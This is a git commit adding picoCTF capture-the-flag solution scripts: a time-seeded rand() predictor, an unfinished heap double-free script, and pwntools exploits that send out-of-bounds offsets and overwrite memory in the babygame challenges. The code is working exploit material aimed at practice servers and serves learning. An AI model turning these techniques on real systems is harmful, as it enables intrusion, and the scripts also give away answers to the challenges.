seed spring, (wip) sice_cream, cache me outside, babygame01/02

programmeruser2 · programmeruser2 · commit 34a9aa26d313 · 2023-04-05T16:45:11.000-04:00
diff --git a/picoCTF/2019/seed_spring_generator b/picoCTF/2019/seed_spring_generator
diff --git a/picoCTF/2019/seed_spring_generator.c b/picoCTF/2019/seed_spring_generator.c
@@ -0,0 +1,18 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+
+int main(int argc, char* argv[]) {
+	// For best results, run on webshell.picoctf.net with an offset of 0
+	// If you can't get it to work try repeatedly running it with an offset of 0-2 seconds
+	// An offset of 1 second is the best/most optimal one from my experience
+	if (argc < 2) {
+		puts("Usage: seed_spring_generator <offset in seconds>");
+		return 0;
+	}
+	srand(time(NULL) + atoi(argv[1]));
+	for (int i = 1; i <= 30; ++i) {
+		printf("%d\n", rand() & 0xf);
+	}
+}
+
diff --git a/picoCTF/2019/sice_cream.py b/picoCTF/2019/sice_cream.py
@@ -0,0 +1,14 @@
+from pwn import *
+r = remote('jupiter.challenges.picoctf.org', 51860)
+r.sendline(b'myname')
+
+# 1. Write address of the function that reads a file
+# Allocate
+r.sendline(b'1')
+r.sendline(b'4')
+r.sendline(b'a' * 4)
+# Double Free
+
+
+# 2. Write the flag file name to BSS
+# I'm going to assume that it's flag.txt, which is what it usually is
diff --git a/picoCTF/2021/cache_me_outside.py b/picoCTF/2021/cache_me_outside.py
@@ -0,0 +1,6 @@
+from pwn import *
+r = remote('mercury.picoctf.net', 17612)
+r.sendline(b'-5144')
+r.sendline(b'\x00')
+r.interactive()
+
diff --git a/picoCTF/2023/babygame01.py b/picoCTF/2023/babygame01.py
@@ -0,0 +1,38 @@
+from pwn import *
+port = int(input('port='))
+r = remote('saturn.picoctf.net', port)
+x = 4
+y = 4
+def changechar(c):
+    r.sendline(b'l' + c)
+def change_x(n):
+    # x += n
+    #print('x+=',n)
+    if n < 0:
+        r.send(b'w\n' * (-n))
+    else:
+        r.send(b's\n' * n)
+def change_y(n):
+    # y += n
+    #print('y+=',n)
+    if n < 0:
+        r.send(b'a\n' * (-n))
+    else:
+        r.send(b'd\n' * n)
+def set_x(n):
+    global x
+    diff = n - x
+    change_x(diff)
+    x = n
+def set_y(n):
+    global y
+    diff = n - y
+    change_y(diff)
+    y = n
+def win_game():
+    r.sendline(b'p')
+
+set_x(0)
+set_y(0xaa0 - 0xaa4)
+win_game()
+print(r.recvall())
diff --git a/picoCTF/2023/babygame02.py b/picoCTF/2023/babygame02.py
@@ -0,0 +1,59 @@
+from pwn import *
+port = int(input('port='))
+r = remote('saturn.picoctf.net', port)
+#r = process('/tmp/game2')
+#gdb.attach(r, 'break *0x08049498')
+x = 4
+y = 4
+def changechar(c):
+    r.sendline(b'l' + bytes(c))
+def change_x(n):
+    # x += n
+    #print('x+=',n)
+    if n < 0:
+        r.send(b'w\n' * (-n))
+    else:
+        r.send(b's\n' * n)
+def change_y(n):
+    # y += n
+    #print('y+=',n)
+    if n < 0:
+        r.send(b'a\n' * (-n))
+    else:
+        r.send(b'd\n' * n)
+def set_x(n):
+    global x
+    diff = n - x
+    change_x(diff)
+    x = n
+def set_y(n):
+    global y
+    diff = n - y
+    change_y(diff)
+    y = n
+def win_game():
+    r.sendline(b'p')
+
+# Send payload
+# The -0x5a is so that we don't run over the x and y variables
+#gdb.attach(r)
+#set_x(-1)
+#set_y(0x5a - 3 - 0x1f)
+#set_y(47)
+# We write y before x, because apparently ebp-0x8 inside move_player is used to set esp? 
+# (that messed me up the first time)
+# at (0,0), $eax-($ebp+4)=0xffffc353-0xffffc32c=39 (confirmed with GDB)
+#changechar(b'\x5d')
+# fsr 0x5d doesn't work so we'll use one of the bytes in the big chunk of NOPs
+changechar(b'\x6f')
+set_y(0x5a - 39)
+set_x(-1)
+
+# Get the flag!
+r.interactive()
+
+#r.interactive()
+#win_game()
+#while 1: print(r.recvline())
+#r.close()
+#print(r.recvall())
